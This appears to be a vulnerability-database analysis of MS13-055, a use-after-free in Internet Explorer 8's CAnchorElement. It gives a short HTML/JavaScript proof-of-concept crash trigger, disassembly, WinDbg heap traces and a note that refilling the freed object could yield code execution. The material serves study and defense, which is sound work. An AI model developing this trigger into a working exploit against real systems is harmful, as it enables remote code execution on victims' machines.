Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
0

MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free

Last updated February 13, 2020
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka “Internet Explorer Memory Corruption Vulnerability.”

Add Assessment

1
Technical Analysis

Analysis

In IE8 standards mode, it’s possible to cause a use-after-free condition by first creating an
illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being
a sub table element. When the CPhraseElement’s outer content is reset by using either outerText
or outerHTML through an event handler, this triggers a free of its child element (in this case,
a CAnchorElement, but some other objects apply too), but a reference is still kept in function
SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next
functions, eventually used in mshtml!CElement::Doc when it’s trying to make a call to the object’s
SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take
advantage of this by first creating an CAnchorElement object, let it free, and then replace the
freed memory with another fake object. Successfully doing so may allow arbitrary code execution
under the context of the user.

This bug is specific to Internet Explorer 8 only. It was originally discovered by Orange Tsai at
Hitcon 2013, but was silently patched in the July 2013 update (MS13-055).

PoC does not trigger for the following setups:

  • Win XP SP3 + IE7
  • Win 7 SP1 + IE9

PoC

<!DOCTYPE html>

<table>
    <tr>
        <div>
            <span>
                <q id='e'>
                    <a>
                        <td></td>
                    </a>
                </q>
            </span>
        </div>
    </tr>
</table>

<script>
window.onload = function(){
var x = document.getElementById('e');
x.outerHTML = '';
}
</script>
</html>

DOM Tree

CBodyElement -> CTable -> CTableSection -> CTableRow -> CPhraseElement -> CAnchorElement -> CTableCell

Win XP SP3 + IE8

.text:63717B12 ; public: class ISpanQualifier * __thiscall SRunPointer::SpanQualifier(void)const
.text:63717B12 ?SpanQualifier@SRunPointer@@QBEPAVISpanQualifier@@XZ proc near
...
text:63717B2D                 mov     eax, [eax+0Ch]

And then this return value is passed on to GetFancyFormat:

.text:6371DBC5                 call    ?SpanQualifier@SRunPointer@@QBEPAVISpanQualifier@@XZ ; SRunPointer::SpanQualifier(void)
.text:6371DBCA                 call    ?GetFancyFormat@ISpanQualifier@@QAEPBVCFancyFormat@@_N@Z ; ISpanQualifier::GetFancyFormat(bool)
...

In GetFancyFormat, that return value is assigned to ESI:
.text:63717F1A                 mov     esi, eax
.text:63717F1C                 call    ?IsTreeNodeQualifier@ISpanQualifier@@QBE_NXZ ; ISpanQualifier::IsTreeNodeQualifier(void)

ESI will then get assigned to ECX - "this" in C++:
.text:63717F29                 mov     ecx, esi
.text:63717F2B                 call    ?GetFancyFormat@CTreeNode@@QAEPBVCFancyFormat@@XZ ; CTreeNode::GetFancyFormat(void)

You keep following ECX, eventually that leads to the crash.

0:008> dd ebx L30/4
06a20fb0  06a32f98 00000000 ffff0002 ffffffff
06a20fc0  00000011 00000000 00000000 00000000
06a20fd0  00000000 06a20fd8 00000012 00000000


vftable     = 06a32f98
Ref counter = 0


0:008> !heap -p -a ebx
    address 06a20fb0 found in
    _DPH_HEAP_ROOT @ 151000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 653d418:          6a20fb0               4c -          6a20000             2000
          ? <Unloaded_pi.dll>+6a32f97
    7c918f01 ntdll!RtlAllocateHeap+0x00000e64
    636a9a94 mshtml!CHtmRootParseCtx::OverlappedEndElement+0x00000141
    636a99d3 mshtml!CHtmRootParseCtx::EndElement+0x000000cb
    635a8ee4 mshtml!CHtmTextParseCtx::EndElement+0x0000006e
    635a71eb mshtml!CHtmParse::EndElement+0x0000007b
    6359f47c mshtml!CHtmParse::CloseContainer+0x000001c5
    635bf441 mshtml!CHtmParse::CloseAllContainers+0x00000026
    635a941d mshtml!CHtmParse::PrepareContainer+0x0000007f
    635a933f mshtml!CHtmParse::ParseBeginTag+0x00000028
    635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082
    635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237
    635a734c mshtml!CHtmPost::Exec+0x00000221
    635ac2b8 mshtml!CHtmPost::Run+0x00000015
    635ac21b mshtml!PostManExecute+0x000001fd
    635ac17e mshtml!PostManResume+0x000000f8
    635ac0e2 mshtml!CHtmPost::OnDwnChanCallback+0x00000010



0:008> !heap -p -a ecx
    address 06a32f98 found in
    _DPH_HEAP_ROOT @ 151000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    653d6c0:          6a32000             2000
    7c927553 ntdll!RtlFreeHeap+0x000000f9
    637e06f2 mshtml!CAnchorElement::`vector deleting destructor'+0x00000028
    63628a50 mshtml!CBase::SubRelease+0x00000022
    63625df6 mshtml!CElement::PrivateExitTree+0x00000011
    635c5ef1 mshtml!CMarkup::SpliceTreeInternal+0x00000083
    635c84e3 mshtml!CDoc::CutCopyMove+0x000000ca
    635c9264 mshtml!CDoc::Remove+0x00000018
    635c92e9 mshtml!RemoveWithBreakOnEmpty+0x0000003a
    63742f86 mshtml!CElement::InjectInternal+0x0000032a
    635c9415 mshtml!CElement::InjectCompatBSTR+0x00000046
    638bb56b mshtml!CElement::put_outerText+0x00000025
    6366906f mshtml!GS_BSTR+0x000001ab
    636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1
    6366418a mshtml!CElement::ContextInvokeEx+0x0000009d
    6362b6ce mshtml!CInput::VersionedInvokeEx+0x0000002d
    63642eec mshtml!PlainInvokeEx+0x000000ea

.text:635C4A2E ; public: static long __stdcall CAnchorElement::CreateElement(class CHtmTag *, class CDoc *, class CElement * *)
.text:635C4A2E ?CreateElement@CAnchorElement@@SGJPAVCHtmTag@@PAVCDoc@@PAPAVCElement@@@Z proc near
.text:635C4A2E                                         ; DATA XREF: .text:6364B798o
.text:635C4A2E
.text:635C4A2E arg_4           = dword ptr  0Ch
.text:635C4A2E arg_8           = dword ptr  10h
.text:635C4A2E
.text:635C4A2E ; FUNCTION CHUNK AT .text:638589CC SIZE 0000000A BYTES
.text:635C4A2E
.text:635C4A2E                 mov     edi, edi
.text:635C4A30                 push    ebp
.text:635C4A31                 mov     ebp, esp
.text:635C4A33                 push    esi
.text:635C4A34                 push    edi
.text:635C4A35                 push    68h             ; dwBytes
.text:635C4A37                 push    8               ; dwFlags
.text:635C4A39                 push    _g_hProcessHeap ; hHeap
.text:635C4A3F                 xor     edi, edi
.text:635C4A41                 call    ds:__imp__HeapAlloc@12 ; HeapAlloc(x,x,x)



0:008> r
eax=63aae200 ebx=06a20fb0 ecx=06a32f98 edx=00000000 esi=037cd1e0 edi=00000000
eip=6363fcc4 esp=037cd1b4 ebp=037cd1cc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
6363fcc4 8b01            mov     eax,dword ptr [ecx]  ds:0023:06a32f98=????????

0:008> dds 63630788+0x70 L1
636307f8  6363fc94 mshtml!CElement::SecurityContext



0:008> k
ChildEBP RetAddr
037cd1b0 63602718 mshtml!CElement::Doc
037cd1cc 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
037cd478 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
037cd488 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
037cd498 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
037cd4a8 63717f30 mshtml!CTreeNode::GetFancyFormat+0x35
037cd4b4 6371dbcf mshtml!ISpanQualifier::GetFancyFormat+0x5a
037cd4c0 6371db8f mshtml!SRunPointer::IsRelativeSpanEdge+0x3a
037cd4c8 637224a7 mshtml!SRunPointer::IsRelativeSpan+0x14
037cd4e8 63722412 mshtml!CDisplayBoxProperties::GetHasInlineOutlines+0x7d
037cd518 63723ccf mshtml!CDisplayBoxProperties::SetDisplayBoxProperties+0x24d
037cd89c 63723c13 mshtml!CPtsTextParaclient::SetupTextDisplayBox+0x90
037cd924 63723b48 mshtml!CPtsTextParaclient::SetupDisplayBoxForSpan+0x66
037cda10 6370e989 mshtml!CPtsTextParaclient::SetupDisplayBox+0x203
037cdac8 6370e73e mshtml!CPtsBfcBlockParaclient::SetupDisplayBoxForTrack+0x2b7
037cde48 636ccc93 mshtml!CPtsBfcBlockParaclient::SetupDisplayBox+0x349
037cdeec 636cca21 mshtml!CPtsTableContainerParaclient::SetupDisplayBoxForTrack+0x130
037ce408 6370c515 mshtml!CPtsTableContainerParaclient::SetupDisplayBox+0x2ad
037ce888 6370c515 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a6
037ced08 6370e989 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a6

Win 7 SP0 + IE8

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
....
0:012> g
....
(c20.274): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=6b105100 ebx=08a7ffb0 ecx=08f0ff98 edx=00000000 esi=043fcf78 edi=00000000
eip=6ad8c400 esp=043fcf4c ebp=043fcf64 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
6ad8c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:08f0ff98=????????
0:005> u
mshtml!CElement::Doc:
6ad8c400 8b01            mov     eax,dword ptr [ecx]
6ad8c402 8b5070          mov     edx,dword ptr [eax+70h]
6ad8c405 ffd2            call    edx
6ad8c407 8b400c          mov     eax,dword ptr [eax+0Ch]
6ad8c40a c3              ret
6ad8c40b 33c0            xor     eax,eax
6ad8c40d e9f7aeffff      jmp     mshtml!CAttrArray::PrivateFind+0x8f (6ad87309)
6ad8c412 90              nop
0:005> k
ChildEBP RetAddr
043fcf48 6adb5961 mshtml!CElement::Doc
043fcf64 6adb586d mshtml!CTreeNode::ComputeFormats+0xba
043fd210 6adba12d mshtml!CTreeNode::ComputeFormatsHelper+0x44
043fd220 6adba0ed mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
043fd230 6adba0d4 mshtml!CTreeNode::GetFancyFormatHelper+0xf
043fd240 6ac3b9c4 mshtml!CTreeNode::GetFancyFormat+0x35
043fd24c 6acb15b0 mshtml!ISpanQualifier::GetFancyFormat+0x5a
043fd258 6acb156d mshtml!SRunPointer::IsRelativeSpanEdge+0x3a
043fd260 6acb4c92 mshtml!SRunPointer::IsRelativeSpan+0x14
043fd290 6acb4bfd mshtml!CDisplayBoxProperties::GetHasInlineOutlines+0x7d
043fd2c0 6acb532e mshtml!CDisplayBoxProperties::SetDisplayBoxProperties+0x24c
043fd644 6acb5272 mshtml!CPtsTextParaclient::SetupTextDisplayBox+0x90
043fd6d4 6acb51a7 mshtml!CPtsTextParaclient::SetupDisplayBoxForSpan+0x66
043fd7c0 6ac9e4a9 mshtml!CPtsTextParaclient::SetupDisplayBox+0x203
043fd878 6ac9e271 mshtml!CPtsBfcBlockParaclient::SetupDisplayBoxForTrack+0x2b7
043fdbf8 6ac57a79 mshtml!CPtsBfcBlockParaclient::SetupDisplayBox+0x352
043fdc9c 6ac57834 mshtml!CPtsTableContainerParaclient::SetupDisplayBoxForTrack+0x133
043fe1b8 6ac9d919 mshtml!CPtsTableContainerParaclient::SetupDisplayBox+0x2ad
043fe638 6ac9d919 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a9
043feab8 6ac9e4a9 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a9
0:005> !heap -p -a ebx
    address 08a7ffb0 found in
    _DPH_HEAP_ROOT @ 51000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 83d3e04:          8a7ffb0               4c -          8a7f000             2000
    6d4f8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77594ea6 ntdll!RtlDebugAllocateHeap+0x00000030
    77557d96 ntdll!RtlpAllocateHeap+0x000000c4
    775234ca ntdll!RtlAllocateHeap+0x0000023a
    6ac2565b mshtml!CHtmRootParseCtx::OverlappedEndElement+0x00000141
    6ac2557e mshtml!CHtmRootParseCtx::EndElement+0x000000cb
    6ad17870 mshtml!CHtmTextParseCtx::EndElement+0x0000006e
    6ad170b8 mshtml!CHtmParse::EndElement+0x0000007b
    6ad2a4de mshtml!CHtmParse::CloseContainer+0x000001c1
    6ad292d3 mshtml!CHtmParse::CloseAllContainers+0x00000026
    6ad18864 mshtml!CHtmParse::PrepareContainer+0x0000007f
    6ad18907 mshtml!CHtmParse::ParseBeginTag+0x00000028
    6ad16e93 mshtml!CHtmParse::ParseToken+0x00000082
    6ad175c9 mshtml!CHtmPost::ProcessTokens+0x00000237
    6ad078e8 mshtml!CHtmPost::Exec+0x00000221
    6ad08a99 mshtml!CHtmPost::Run+0x00000015
    6ad089fd mshtml!PostManExecute+0x000001fb
    6ad07c66 mshtml!PostManResume+0x000000f7
    6ad213f6 mshtml!CHtmPost::OnDwnChanCallback+0x00000010
    6ad053fc mshtml!CDwnChan::OnMethodCall+0x00000019
    6ada94b2 mshtml!GlobalWndOnMethodCall+0x000000ff
    6ad937f7 mshtml!GlobalWndProc+0x0000010c
    75bc86ef USER32!InternalCallWinProc+0x00000023
    75bc8876 USER32!UserCallWinProcCheckWow+0x0000014b
    75bc89b5 USER32!DispatchMessageWorker+0x0000035e
    75bc8e9c USER32!DispatchMessageW+0x0000000f
    6d8004a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6d810446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    763849bd iertutil!CIsoScope::RegisterThread+0x000000ab
    75f71174 kernel32!BaseThreadInitThunk+0x0000000e
    7752b3f5 ntdll!__RtlUserThreadStart+0x00000070
    7752b3c8 ntdll!_RtlUserThreadStart+0x0000001b


0:005> !heap -p -a ecx
    address 08f0ff98 found in
    _DPH_HEAP_ROOT @ 51000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    8f50138:          8f0f000             2000
    6d4f90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77595674 ntdll!RtlDebugFreeHeap+0x0000002f
    77557aca ntdll!RtlpFreeHeap+0x0000005d
    77522d68 ntdll!RtlFreeHeap+0x00000142
    75f6f1ac kernel32!HeapFree+0x00000014
    6adf8c42 mshtml!CAnchorElement::`vector deleting destructor'+0x00000028
    6ad97dd0 mshtml!CBase::SubRelease+0x00000022
    6adf0fdf mshtml!CElement::PrivateExitTree+0x00000011
    6acd5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
    6acd6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
    6acd6f39 mshtml!CDoc::Remove+0x00000018
    6acd6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
    6ac0288a mshtml!CElement::InjectInternal+0x0000032a
    6acd704a mshtml!CElement::InjectCompatBSTR+0x00000046
    6af1aee9 mshtml!CElement::put_outerText+0x00000025
    6ae172d6 mshtml!GS_BSTR+0x000001ac
    6ae0235c mshtml!CBase::ContextInvokeEx+0x000005dc
    6ae0c75a mshtml!CElement::ContextInvokeEx+0x0000009d
    6ae0c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
    6adb3104 mshtml!PlainInvokeEx+0x000000eb
    6cdea22a jscript!IDispatchExInvokeEx2+0x00000104
    6cdea175 jscript!IDispatchExInvokeEx+0x0000006a
    6cdea3f6 jscript!InvokeDispatchEx+0x00000098
    6cdea4a0 jscript!VAR::InvokeByName+0x00000139
    6cdfd8c8 jscript!VAR::InvokeDispName+0x0000007d
    6cde9c0e jscript!CScriptRuntime::Run+0x0000208d
    6cdf5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6cdf5bfb jscript!ScrFncObj::Call+0x0000008d
    6cdf5e11 jscript!CSession::Execute+0x0000015f
    6cdef3ee jscript!NameTbl::InvokeDef+0x000001b5
    6cdeea2e jscript!NameTbl::InvokeEx+0x0000012c
    6ae27af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
Log in to Add Reply

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis